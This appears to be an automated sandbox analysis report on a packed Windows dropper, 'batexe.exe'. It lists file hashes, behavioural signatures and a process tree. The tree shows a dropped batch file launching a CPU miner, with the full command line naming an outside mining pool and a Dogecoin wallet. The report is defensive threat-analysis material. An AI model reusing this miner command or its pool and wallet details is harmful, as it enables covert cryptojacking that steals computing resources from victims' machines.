Analysis

  • max time kernel
    295s
  • max time network
    305s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240221-ja
  • resource tags

    arch:x64arch:x86image:win10v2004-20240221-jalocale:ja-jpos:windows10-2004-x64systemwindows
  • submitted
    22/02/2024, 07:01

General

  • Target

    batexe.exe

  • Size

    9.4MB

  • MD5

    cdc9eacffc6d2bf43153815043064427

  • SHA1

    d05101f265f6ea87e18793ab0071f5c99edf363f

  • SHA256

    73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

  • SHA512

    fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6

  • SSDEEP

    196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score
7/10
upx

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 5 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\batexe.exe
    "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2284
    • C:\Users\Admin\AppData\Local\Temp\8462.tmp\b2e.exe
      "C:\Users\Admin\AppData\Local\Temp\8462.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\8462.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4692
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8CCF.tmp\batchfile.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3968
        • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
          cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:2184
  • C:\Windows\System32\Upfc.exe
    C:\Windows\System32\Upfc.exe /launchtype periodic /cv NK2IaB9JKUiKUlx21kNcMA.0
    1⤵
      PID:3456

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\8462.tmp\b2e.exe

      Filesize

      15.7MB

      MD5

      65e99584602eb643ff6e1ea2ebbe19bd

      SHA1

      2bb281fce2fcb03862d4b8e9764733c69ccaabc6

      SHA256

      43268671a356ecd714bd2484704ff53c984aaa39e81108d48e9f722060e484d8

      SHA512

      959567060a2dd8bf206ce655d66876a11e8b7021c639c924401e28722a7e44ee1d7d3b644e4bfe6841ef1be5ece9d5a8a206c15995e1033e79ad08e3f8605f0c

    • C:\Users\Admin\AppData\Local\Temp\8462.tmp\b2e.exe

      Filesize

      1.6MB

      MD5

      4b3e3a3f84660472fb9714cd8feaba1b

      SHA1

      8561afb6ae0a1ab8a4d8364928811b66fcaf9da9

      SHA256

      006513b9e4310066d4cb66a1ea11b6619c10e428f5a1ccc39eab92e1d487f442

      SHA512

      a4ccf4de38da8d27dd065ef09b81a4bca708188c6102211faaa186ddd8f68b87381611da54cb6098758733c799e2a3450cb5cae66b58c29a4264d93f93a1edc2

    • C:\Users\Admin\AppData\Local\Temp\8462.tmp\b2e.exe

      Filesize

      2.0MB

      MD5

      63ac9e6bdbb597f9b36735bf5bef44b9

      SHA1

      1dc9991e23d5376255b667168943a8644b6c8bb0

      SHA256

      378ebfaaafc967d9796f7c4dd00dc987bdd13cc2efc4ef778fd82836863520e8

      SHA512

      c4b90217cd1bfeb925b403da3191f19bf91b12543930d5ddb8c4c0bbe02cf36c0e4c14034bcaf207fcd440d149723315c5d2eab38eae94913469dd123e88d411

    • C:\Users\Admin\AppData\Local\Temp\8CCF.tmp\batchfile.bat

      Filesize

      136B

      MD5

      8ea7ac72a10251ecfb42ef4a88bd330a

      SHA1

      c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

      SHA256

      65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

      SHA512

      a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

    • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

      Filesize

      1.4MB

      MD5

      2ef40d5c3b964c66392be6a3db51bf84

      SHA1

      391a644aa11504129db4b42007b054f2c3bf5414

      SHA256

      0ef835e2576ba8fbfcd733a66284579607cc8dafdc2b26fe3c0091dc66d8e707

      SHA512

      0b568c8b5ef88af49c00801cd5eaf3e7262367d2a3356f1a685d36e3c1dff63babb5dd049d5a1e7fbe214cab35e6f271d0a105e073a1fb2c281bb5c0279b7107

    • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

      Filesize

      1.4MB

      MD5

      2af1ce05b5a790b134eefd1efd88dab7

      SHA1

      b078e6f3cf7ee356e0d9b671c6d33f3a6e777524

      SHA256

      ce4cb4f4e60a89cbf413622a7f96f879ee15256d4ed5872ccbc3f2b366369fe3

      SHA512

      bc08666b4c96fb98b1e1a9db0ec10c5bbcddb82efc4829d65057f765a37a24f6e28076300dcc3f07c0b547b563593232f90d959607ee6a5faca26b27364cf695

    • C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

      Filesize

      64KB

      MD5

      e7317a0a343dc63f3fa3bf9ca6e93ff0

      SHA1

      0d48881feb76cf81fc46614bebfa3c134cada128

      SHA256

      277a43f17ccc4f0fba87c710212de61a41383bcb94410fa093b50ebd50347a63

      SHA512

      84ef51472db00cd4e90df3062a3cbc29a994c5cf470e54300d4a2f103ba8fb8279ec87b0561625ea1bccd80a7ad664c63457831b4eb919a7608099430b98a3d9

    • C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

      Filesize

      836KB

      MD5

      aeab40ed9a8e627ea7cefc1f5cf9bf7a

      SHA1

      5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

      SHA256

      218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

      SHA512

      c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

    • C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

      Filesize

      1.2MB

      MD5

      7cf672bee2afba2dcd0c031ff985958e

      SHA1

      6b82a205db080ffdcb4a4470fce85a14413f3217

      SHA256

      c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05

      SHA512

      3e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5

    • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

      Filesize

      1.7MB

      MD5

      1e9f85c2f0775fad9062c4353b786616

      SHA1

      6022d9392d840ca887e54b25822fcdd33da85c71

      SHA256

      e12062782760feb5983ef38a672d759883368d4fa517e33401e76424651a5849

      SHA512

      7077d4277e97c174a49d4d5e94a42934dbbdcfc84ae568855d30af5df26f3d8834164a4bc2f8a776ccc6f9262fe100d6af22c9790caf39459057f58da2991e8b

    • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

      Filesize

      1.3MB

      MD5

      696922f5250b5df33813776816103357

      SHA1

      6f6e4cecb16596c1ad0e631c7ab5b56659da1ca2

      SHA256

      2802e69b65032d2cb76172ab508766f8a2b2beba9c2cd84dbf7c28fc9cbe1c7d

      SHA512

      dcb8535a83f321561241432304155a2e2a18435e102785a5789bd3a9ed643f153fb63ca797c8ca798d2d85927b29375048b43b0ef0bc4cb00c1c96b5822e8ae9

    • C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

      Filesize

      606KB

      MD5

      585efec1bc1d4d916a4402c9875dff75

      SHA1

      d209613666ccac9d0ddab29a3bc59aa00a0968fa

      SHA256

      2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

      SHA512

      b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

    • memory/2184-49-0x0000000000400000-0x0000000000667000-memory.dmp

      Filesize

      2.4MB

    • memory/2184-54-0x0000000000400000-0x0000000000667000-memory.dmp

      Filesize

      2.4MB

    • memory/2184-105-0x0000000000400000-0x0000000000667000-memory.dmp

      Filesize

      2.4MB

    • memory/2184-44-0x0000000000400000-0x0000000000667000-memory.dmp

      Filesize

      2.4MB

    • memory/2184-45-0x0000000061440000-0x000000006156B000-memory.dmp

      Filesize

      1.2MB

    • memory/2184-46-0x000000006FC40000-0x00000000714F5000-memory.dmp

      Filesize

      24.7MB

    • memory/2184-47-0x0000000000F40000-0x0000000000FFC000-memory.dmp

      Filesize

      752KB

    • memory/2184-48-0x0000000071700000-0x0000000071798000-memory.dmp

      Filesize

      608KB

    • memory/2184-41-0x0000000000F40000-0x0000000000FFC000-memory.dmp

      Filesize

      752KB

    • memory/2184-95-0x0000000000400000-0x0000000000667000-memory.dmp

      Filesize

      2.4MB

    • memory/2184-90-0x0000000000400000-0x0000000000667000-memory.dmp

      Filesize

      2.4MB

    • memory/2184-60-0x0000000000400000-0x0000000000667000-memory.dmp

      Filesize

      2.4MB

    • memory/2184-65-0x0000000000400000-0x0000000000667000-memory.dmp

      Filesize

      2.4MB

    • memory/2184-70-0x0000000000400000-0x0000000000667000-memory.dmp

      Filesize

      2.4MB

    • memory/2184-80-0x0000000000400000-0x0000000000667000-memory.dmp

      Filesize

      2.4MB

    • memory/2184-85-0x0000000000400000-0x0000000000667000-memory.dmp

      Filesize

      2.4MB

    • memory/2284-9-0x0000000000400000-0x000000000393A000-memory.dmp

      Filesize

      53.2MB

    • memory/4692-59-0x0000000000400000-0x0000000000405000-memory.dmp

      Filesize

      20KB

    • memory/4692-8-0x0000000000400000-0x0000000000405000-memory.dmp

      Filesize

      20KB